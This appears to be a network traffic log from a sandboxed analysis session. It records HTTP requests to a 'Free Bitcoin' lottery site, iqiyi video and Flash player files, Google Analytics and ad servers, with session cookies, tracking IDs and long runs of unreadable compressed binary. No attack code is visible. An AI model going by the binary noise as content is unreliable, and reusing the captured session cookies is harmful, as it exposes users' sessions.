Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: application/javascript

Connection: keep-alive

Last-Modified: Mon, 11 May 2015 15:34:58 GMT

ETag: "a5a2a5-28f7-515d01ed1cc80"

Accept-Ranges: bytes

Content-Length: 10487
// This [jQuery](hXXp://jquery.com/) plugin implements an `<iframe&
gt;`..// [transport](hXXp://api.jquery.com/extending-ajax/#Transports)
 so that..// `$.ajax()` calls support the uploading of files using sta
ndard HTML file..// input fields. This is done by switching the exchan
ge from `XMLHttpRequest`..// to a hidden `iframe` element containing a
 form that is submitted...// The [source for the plugin](hXXp://github
.com/cmlenz/jquery-iframe-transport)..// is available on [Github](http
://github.com/) and dual licensed under the MIT..// or GPL Version 2 l
icenses...// ## Usage..// To use this plugin, you simply add an `ifram
e` option with the value `true`..// to the Ajax settings an `$.ajax()`
 call, and specify the file fields to..// include in the submssion usi
ng the `files` option, which can be a selector,..// jQuery object, or 
a list of DOM elements containing one or more..// `<input type="fil
e">` elements:..//     $("#myform").submit(function() {..//        
 $.ajax(this.action, {..//             files: $(":file", this),..//   
          iframe: true..//         }).complete(function(data) {..//   
          console.log(data);..//         });..//     });..// The plugi
n will construct hidden `<iframe>` and `<form>` elements, 
add the..// file field(s) to that form, submit the form, and process t
he response...// If you want to include other form fields in the form 
submission, include..// them in the `data` option, and set the `proces
sData` option to `false`:..//     $("#myform").submit(function() {<<< skipped >>>

GET /index.php?s=/ucenter/public/getinformation.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: application/json, text/javascript, */*; q=0.01

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 59

{"messages":null,"new_talk_messages":null,"new_talks":null}HTTP/1.1 20
0 OK..Server: nginx/1.0.15..Date: Fri, 20 Jan 2017 09:55:23 GMT..Conte
nt-Type: text/html..Connection: keep-alive..X-Powered-By: PHP/5.3.14..
Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-ca
che, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Con
tent-Length: 59..{"messages":null,"new_talk_messages":null,"new_talks"
:null}....

GET /index.php?s=/ucenter/public/getinformation.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: application/json, text/javascript, */*; q=0.01

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 59

{"messages":null,"new_talk_messages":null,"new_talks":null}HTTP/1.1 20
0 OK..Server: nginx/1.0.15..Date: Fri, 20 Jan 2017 09:55:35 GMT..Conte
nt-Type: text/html..Connection: keep-alive..X-Powered-By: PHP/5.3.14..
Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-ca
che, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Con
tent-Length: 59..{"messages":null,"new_talk_messages":null,"new_talks"
:null}..

GET /pages/user/proxy.action HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: passport.pps.tv

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/html; charset=utf-8

Last-Modified: Mon, 21 Mar 2016 04:14:07 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Expires: Thu, 31 Dec 2037 23:55:55 GMT

Cache-Control: max-age=315360000

P3P: CP=CAO PSA OUR

Content-Encoding: gzip
26f.............T.n.0... 6<....qNE$9(......=.v...:.#.2I..Z.{I.a.q..
'.1;3.]m|z7..........I\....../.2G...-/p.......ba/.U..D.K....<A."...
M.vq...k.....K.^*X(.B c`.r...h.Z....e....^...ei.:.Fi.7.>%`.H..x....
JA.JV.....a..1.|@....a...!..ym.`.5.....VC...NG...j.F.J....uv.........G
.<..L...aK.=.......].......QE.2v.>........)c..#5e&m@(.......a...
.U.p.d....s%...;...{......@...Qk.4.V....37.S6e....=..,...#.e.O..'...yT
G......(_...5.o|.M}...K3.v...I.}..<<c...-. .N...m0.Y.kU..U....t.
.........=F.a...3.hs.........!.9.u.j..a.dS....)h,.....;.W...7....z.1.=
.w.$.z...}z..$...........KU8.7......E%.i...y...z..'.S....~.n..........
r.f.9.w.q...fh3u.....0..HTTP/1.1 200 OK..Server: Tengine..Date: Fri, 2
0 Jan 2017 09:55:12 GMT..Content-Type: text/html; charset=utf-8..Last-
Modified: Mon, 21 Mar 2016 04:14:07 GMT..Transfer-Encoding: chunked..C
onnection: keep-alive..Vary: Accept-Encoding..Expires: Thu, 31 Dec 203
7 23:55:55 GMT..Cache-Control: max-age=315360000..P3P: CP=CAO PSA OUR.
.Content-Encoding: gzip..26f.............T.n.0... 6<....qNE$9(.....
.=.v...:.#.2I..Z.{I.a.q..'.1;3.]m|z7..........I\....../.2G...-/p......
.ba/.U..D.K....<A."...M.vq...k.....K.^*X(.B c`.r...h.Z....e....^...
ei.:.Fi.7.>%`.H..x....JA.JV.....a..1.|@....a...!..ym.`.5.....VC...N
G...j.F.J....uv.........G.<..L...aK.=.......].......QE.2v.>.....
...)c..#5e&m@(.......a....U.p.d....s%...;...{......@...Qk.4.V....37.S6
e....=..,...#.e.O..'...yTG......(_...5.o|.M}...K3.v...I.}..<<c..
.-. .N...m0.Y.kU..U....t..........=F.a...3.hs.........!.9.u.j..a.d<<< skipped >>>

GET /analytics.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: VVV.google-analytics.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Strict-Transport-Security: max-age=10886400; includeSubDomains; preload

Timing-Allow-Origin: *

Date: Fri, 20 Jan 2017 08:34:29 GMT

Expires: Fri, 20 Jan 2017 10:34:29 GMT

Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 11590

Cache-Control: public, max-age=7200

Age: 4849
...........}iw..........tc.m'.a.i|B...F6 ...%.6.F.....o..JR/..{.....s'
V..VK..J.W..Hz...=....S....=$......l.j.......d....?Q...-..K...j(FR..W]
.b._..V.Ea-.6u.......D..gF.....[.<..W...../............`z.....g.l..
~.............>..........GB..N....?...?.I2.....U...o<.....W.;...
x qq......J.......zC.q...?.<.....P.."..[.|.....\P.c...[8.......FB;/
..#..N.........,.:..}.mw.....Bx..?...r=&`..,Q....)j.v..f3.._.y....<
.}..........y.5..l...fk..E.B7].X....%. h...6m...J$O.......!=.P,..$qo..
...]]..8g?....f..Oj......M..b4.$.T$...{...R..^......_.63T-.e..#h7Y.F..
~..}..Q....\..Z.2KKO...on8..%.!.n.."V<Qo.j......0. .o{2..u(uU..M.8.
E..FDs6.y.....7..\..g.....x4.7<.......yg.{f.....>.k/s..V..k....)
....s)..@...$QC.7..\.P*I..uI.E.........U..7.<.]Wy.0.....]..........
..*.2.[.0 @e.1....qXT._... .!8..IO..........L%..}.6.%.u6'"...."*.>.
........[.U]..O.k.p.........C'QwI......*..~(..B.v.g...&.y...@.f....S.9
..........<....8@........r..R..=.y.1..M....D...G..P..O..s.v)/[.....
q.......e.s*.aE3"p[..J.[Xj<}.....u...^^.=.....u.....V....sR....Z...
...Uo....P\........M.!,L..v...[....'.hBd.n.....rr....c..@=.o.N..|A....
C..-.D...ju....E.t....s.......p$.7.HT....S...!.4....]./.X.......C.C.[.
X....~..B.d.../.e.4..O.r*q`.....d.....b...t........../^6.jg:B........'
....x4...w;D...J1.._`.@].s...'*U....&.a.KFD....<.....Y@.7.?U..a...P
..J.V..\%...O'].Q...[.7....Fn...0tgA.2S.#-....._..%....q......f..9...z
Z...l==.R .@..v...."......[.....".".;..YBf....~.....m.$....d42?.9f..K@
........7.Q_..w.<-...;z..|..*..>...D...(?r.....@F.. ..P]...2<<< skipped >>>

GET /r/collect?v=1&_v=j47&a=1070368555&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AAgAAEAAI~&jid=181594928&cid=150513197.1484906118&tid=UA-70454598-1&_r=1&z=1010198880 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: VVV.google-analytics.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Date: Fri, 20 Jan 2017 09:55:18 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

Last-Modified: Sun, 17 May 1998 03:00:00 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Server: Golfe2

Content-Length: 35
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Date: Fri, 20 Jan 2017 09:55:18 GMT..Pragma: no-cache..E
xpires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-sto
re, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-C
ontent-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2.
.Content-Length: 35..GIF89a.............,...........D..;....


GET /collect?v=1&_v=j47&a=634634703&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AACAAEAAI~&jid=&cid=150513197.1484906118&tid=UA-70454598-1&z=2073781349 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: VVV.google-analytics.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Date: Thu, 12 Jan 2017 19:14:29 GMT

Pragma: no-cache

Expires: Mon, 01 Jan 1990 00:00:00 GMT

Last-Modified: Sun, 17 May 1998 03:00:00 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Server: Golfe2

Content-Length: 35

Cache-Control: no-cache, no-store, must-revalidate

Age: 657665

GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Date: Thu, 12 Jan 2017 19:14:29 GMT..Pragma: no-cache..E
xpires: Mon, 01 Jan 1990 00:00:00 GMT..Last-Modified: Sun, 17 May 1998
 03:00:00 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gi
f..Server: Golfe2..Content-Length: 35..Cache-Control: no-cache, no-sto
re, must-revalidate..Age: 657665..GIF89a.............,...........D..;.
.

GET /v_19rra3jt70.html?list=19rrkqccqe HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Content-Type: text/html; charset=UTF-8

Expires: Fri, 20 Jan 2017 09:57:06 GMT

Cache-Control: max-age=120

Date: Fri, 20 Jan 2017 09:55:06 GMT

Transfer-Encoding:  chunked

Connection: keep-alive

Connection: Transfer-Encoding

00006000..........

<<< skipped >>>

GET /player/cupid/common/clear.swf?r=6yuxxr HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "1695113837"

Last-Modified: Thu, 04 Dec 2014 01:39:56 GMT

Content-Length: 31392

Server: Apache 1.3.29

Cache-Control: max-age=172800

Expires: Sun, 22 Jan 2017 09:55:10 GMT

Date: Fri, 20 Jan 2017 09:55:10 GMT

Connection: keep-alive
CWS.p...x.....\e......s....H.A..H.Crz...r...L....S......\...[@Q..W..{o
.....{...........<gn........3...-..}...}......a...0V)c....a....V...
NQn..m.uxfz...o......7._....u..us....$I...z.=. ...........w.yU..t7...{
..YK....Bo..5.....L..:.U.E.^O..=...w.9dT.....L.;/...n..d......s....k..
.t.=..../.{z...>os1.ik..>l.....WW./.....=oI5S.{]>7.~.3W,...$.
....H....t.{Pw.[..zv.P.....5yG...._q....Ng.,...y...s..WeL{.<.v.s..\
._.9....h..#..y..e?.?..Z.....:T.{.....<....s...B..KCTr...#..|Z.....
.....08o..tF;.2c...?....F2.k....^.......z....^'..h....`.5l...H....~.~.
'........?........_...u...~..F.....r.....e._..wO.y.K~....?.%.o<.)..
..u.......m...|.........Ow...-.q..._..o6...........w....w....-......|.
.#w...o....o.6.....m._x..._w..>1...........7..|.7.?...|....x.O^....
7.>..O}._..v....|.._......'w._..O.o......5...g.j.._....^..?~......]
......;..?.......q_...{......}..7.......;~........R?z..^5.....e..t....
x............?.._.................}.x......?5.{.;.}.....yC/{.K....O..w
.]?..O.....|.......cw.U7....~..........5s.b.r.u.....I.4..:.....lO....9
zzv`s...i,pp..K...O.G.....a>{....1,e.X...F..y.c..k.%.n....#.i....JN
.....:.5w/.d.3.[..dv....a...K.z..B.......v..<....\.9...i..l......%7
....;.t......=.;7..p.........U....;..>..%../...{.........9...<w.
....u..].Svl..jww..h...5......v.34.....Rw...G....G..57..=...F{.....K..
...6M0.......#z4.....\.w1..W.s....-...r..4.z...]...g...%.j...T..5g.x..
...^.[..nK{...iw.,.....j..N.L..8..J....^U1],....s...J?.92Z..=..m.j../.
.D-./....l....y...vw..&.~w.p..-..?=.......vO.......O......q....zak<<< skipped >>>

GET /common/flashplayer/20170119/036300cf212b7b.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "3780665953"

Last-Modified: Thu, 19 Jan 2017 07:26:08 GMT

Content-Length: 214192

Server: Apache 1.3.29

Cache-Control: max-age=578227

Expires: Fri, 27 Jan 2017 02:32:18 GMT

Date: Fri, 20 Jan 2017 09:55:11 GMT

Connection: keep-alive
CWS.....x....TT...:..M.A.Q24 A..$..C.M....%KF.A.I...dP.0.sh..$..T.y..Z
{......s..c.q...jV...WU....o.8.......!.........!. u.BQI.P.B...IB_I....
.....$...DzK........a^>..B........_..).}.=.v7.=}/...`...u.Ax#.^..g.
v.^~Hi6'w;_.V..'V...O.7...0.........c.G...;..............$...;\F.gw.#.
} ..........gd....1......(L.&LBd.......K8..y:{.=...#..0./........#...?
....D|..c...,%.O..U........D..-.(b..lN.......2(..H_^E.O....dns.......h
c..a.i.....w..Y.N..........t.t. WWQS. ..J.v:.(.x8..x88.xPb"<<\..
........>......cee."&&....R1...d...`- .x.1........0..%.b...........
........t.!l......r.....,l..........C.u.*E.`A...qqq....@.......x...TBz
vl...=.V....xYQ.>......_........7...........Q...p....l......... .gw
.^]7.%}...{.....dE.M....K...pix./..$h..A.9.f.hAh7i.{...._&->.....&g
t;.L.`^n.....w....Zvl8U..q'.....cK...H...l..u.....}N.kq^@..y...ib~....
.....p J.jgG~-.)>k..c[..BoC\.k...r..........%..H...|c.......r....0.
.(.t|....*..vD....;9...".....BW.......|1(E..Q<s....?.B(.Oo..!.....,
....C.G.......V.e];r4....Y.koL.4D...FtB.*..= .....'.7%.gT...Q^>.r..
mh|$..4....t.iZ...WF[.0T.c.B.Y.....L...sX...!.......)3...,*.........x.
e.....9.i..!........x{..J.,..n.9.H.b.y.g.F....n.l..5. !..z.........7..
6..%.?RF..:......}.....w-..*..U.t...nR~.=.M.J.9{,..C.....t.....c.#..."
.F.G.....k*;.n."z.L..?..s.x.o67?...h....l.3:uL.Ka..b...7....X._fq.`$m.
D`b.....{W..^h..6-.x.~8..5`l..m..c.{.........#w...\0....~..|[.H#f..r..
......4sO.C...n........ HO...F........h.....c..7..1.e...]R...F.>'..
..-.;$|...a.....m.....g...)`...T.zF..fa..#K.....X.W'C.?~{.i...%t..<<< skipped >>>

GET /common/flashplayer/20170119/1050c72eeb6.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "1728661005"

Last-Modified: Thu, 19 Jan 2017 02:50:35 GMT

Content-Length: 21301

Server: Apache 1.3.29

Cache-Control: max-age=521376

Expires: Thu, 26 Jan 2017 10:44:49 GMT

Date: Fri, 20 Jan 2017 09:55:13 GMT

Connection: keep-alive
CWS.....x....|T...~..{w7.MHBh.t...BW....H.,/.X.)....g./.Ax..("bG.;....
.W...........{..-.......y.i...3g..93wyK4...e_.i.L..3P......i.a.M.)U3..
....E..v..p4.h..1'.p.....n.X8f....:.x..q.......mQ....".......F.;..E...
.....wF..1.....d....E.lj..l......1cG.....)...V.t......F?.....H........
..Z...acR..'..m.N-Y.o....Z.K.JR...EA.M)9.....c._.Vr...t.oQg..9..v$..n.
EO.w`......P)B.....G...S.......v........U t.I....N.....=.[4.x.dK^j=l..
Ka.`u.j3......<.....X~. ....h.g..n>....k.....i....zMC.......jnm.
6X.d...._aS6..qy..(;....O^.......AU...k..A.2_n.U.8......../..........m
.=".....1..#..Xz..?.|...&..77.......=..5....m..i..-A....jhc{...4/m....
.4.1:`.dtk{S.%......?.7(3m.....!..nqs...eM.....................#SY.. 1
....1..5..(L..dQG0..*.....Q....^..B..V...e.L..B..}...G..."u$8..}.B. ..
.*..;......;..t_....;..-...7.;.*Uf..(.lk$C..9vni}..dFi..".X..[[.....,}
45G..kZs.....B..oj..GG........}1....6gE.oNM...6..?.\.u. )k..4......|..
....../Z..]k]....Q...9.4......Y.5......>...pg.m....df} e-Y.J%.%..."
........`....~.:#.43s4.6;JZZ....qE......@K..bi.....wF.M.P..KZ....T}...
...j..l.4G...Z..[..e)..l.....Q....a.;..M.X.I.1.............`4......t..
..u........Q...8..,...Ej:......o..M!7YM...>.Gd.>...vJ}.U5..5.i..
 .2....3^.^.e..m....)....W.%.....e.]}Msk.`.6{%.{4W.....'3rB..=Z}-M.B.c
...;.Y....(.M...lQ~..Z.f8..h..QF......'L}.A.?.<......a.MAT-...9.-..
Zph.m...Zl..........j..l..E5._..-.n2.MV....<....&G..|.....b.k..*.U&
V....Lj.)..]h =..t.KV.V@[..N.g.......49....P.~.:.d...NI'..g.o..%.>h
..3..3,g.x.P'...X.E4.:Z...E58.P...T.....;;,..a.U.YOv....c.;..ka9yD<<< skipped >>>

GET /common/flashplayer/20170118/10382a1b82aa.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8


HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Accept-Ranges: bytes

ETag: "561635105"

Last-Modified: Wed, 18 Jan 2017 02:38:38 GMT

Content-Length: 116268

Server: Apache 1.3.29

Cache-Control: max-age=409740

Expires: Wed, 25 Jan 2017 03:44:14 GMT

Date: Fri, 20 Jan 2017 09:55:14 GMT

Connection: keep-alive
CWS. ...x...kx..u X...V...@.E.M...T..I..(Q.I.HB... e=.pu...".... ).h..
$..#?h...P.,..l%.b'q,%..i.R....L2.3.3...Lv.....$..soU?...w.....~..:..s
.=/).^.....6"...%I....|.t..--=...A.G1..9*...<?.].Zz..?.I....O......
.&..D..7.c.o"c..d..s...3.)$.J..5..g2.............{.......s...N....^H.S
....^.|.H..........3...L..3..^.$.N.>Ev...";.......3..z.Yr...i...|.n
.@...wj..Bn....%..V.%*G..NJH...Q.Q.Q.Q..>F.....0..h..6F;...T.#.j..-
...?#.F..Q5..%.....i.?HtM....1...h...x5..J|...N.%.E.d.E....I..6......l
...D... ...., .R.FV9.&.Y....g.S,...Sz"..O....q..h.zNy..Y.)_.=..d...U .
..H`{.9...gK..b...0e.....N}.K.L.m..-.u..s...r.........z.9en.:M.~N.g''.
.Ry.].V...u.....xS.=<.lS.[...T.....0F.F.......y.)T".Bd.j.Q$Y..*)...
.)..0.)Il../l..6L'4.M(....,l.....X.*@.$..~~vz2...HOL.!.....Da....[.6s.
5#.D...h/.v.B.....6.9=x~&.>.}{..{.oK.m.z..G.....;YX..T....?..oG....
.ln...v.m.j..q..w..V1.c7.#{Xnz"s...:.s..g.c.........|.d......L(....:&g
t;./..*e}..B.tn......|~2cM{.....`*..........{T..o..|.>..]..J4.G..=c
.....29....M8....D.......m.).v2.........4.7iu......B.`.5..e.....h.SI.P
Ii...L%..HL"r..IB0%...SB.{..(r..{..................S%.iZI)1H[.|8...8..
....j"......Jk.5.^..:..........:.2...1.0..f).R.'^.K.2*`.m....f&I..R.RM
z...%%.WIi...`.... )...>F..5...Q.KY...PG..Ev.. U..lj.f.M..|`c.*j.@.
..I.C.U . .o...A. ....0.....>6...R>...;85Q...[..N.....M.H.2.....
(..'...rT.U..*vb..0.iJujsM.:..."A#.....!..`..}@..C<.,.>9}......w
...E0..b.......~.........G.!.T..k.Xq....F%..^....9.BN...@7S]...H.W....
..0...m@..<....~..:.'rE.............dJ.9...*E^%........Y...upp.<<< skipped >>>

GET /ex?i=mm_26632162_2469125_22346699 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: p.tanx.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:09 GMT

Content-Type: application/x-javascript; charset=gbk

Transfer-Encoding: chunked

Connection: close

Server: Tengine

Vary: Accept-Encoding

Expires: Fri, 20 Jan 2017 09:55:08 GMT

Cache-Control: no-cache

Content-Encoding: gzip

Timing-Allow-Origin: *
1c6............].Qo.0.... ..`..@.. KQ.*m.....I.!.8..cG.S...>....r..
|.|....bNh..Q....tt~.S..M...d.&.d.N...&IF.4.L bT.-e...Qk..E.t.e.*...n8
qT...k.<.BTO..~..A2..^..D ...N....WP9.x .r.....q......oB...P.......
.{......./..EP. ..z $.....m...m^.a.k...B.8.%..........O|.).....5..N...
....?...Zg75iZ[...\..w...\...{....i.zH.q:...u96/.3.:....2#..8..[.....n
Ak........3KXE.......O.........Z..&..P~.n.Km8.QEJa..R.Y.3.....7.q..|}.
....T..5....~....w...3F{.....fm..g.............0..

GET /prices/mgets?skuids=J_10263952097,J_1014668736,J_1712213997,J_1683079458,J_10481689014,J_2823639,J_10293479220,J_2631300,J_1002498991,J_10666538087,J_1612802959,J_1319192906,J_10654177939,J_1767125187,J_10292956874,J_1311634685,J_10608382784,J_1031724397&type=1&callback=dsp_1484906111088&r=1484906111107 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: px.3.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: close

Vary: Accept-Encoding

Content-Encoding: gzip
170............m.MN.0....# ..j~....p........K..c.v2&..L..yo..~...,9.".
.....q]......{&p]N....~.(...........`L".,.5.Y....R....}.. L...p.DV.A=e
...E..{d!Y...S...e.4.4.4.qI.....e[.SV....j....}.Z f.*QT.y.J..wX..l.L.@
....t)L(...z.X..l`c50.e....iF.7 .# ....*.....aFG....o..t...s:.-9..o...
....!nT)..q7..x.......g..v..c.blcx.F...}.p..c7....c ...c#...wl2}...J..
...nH...........u..\.....0..

GET /ads/show/show.php?a=3FMLHO8FY55DT&b=QAJCZO2RSCH65 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17e............}R]K.0.}...y..6c..]Z.!...T..E.$k...4q....i.....%$..s.9.
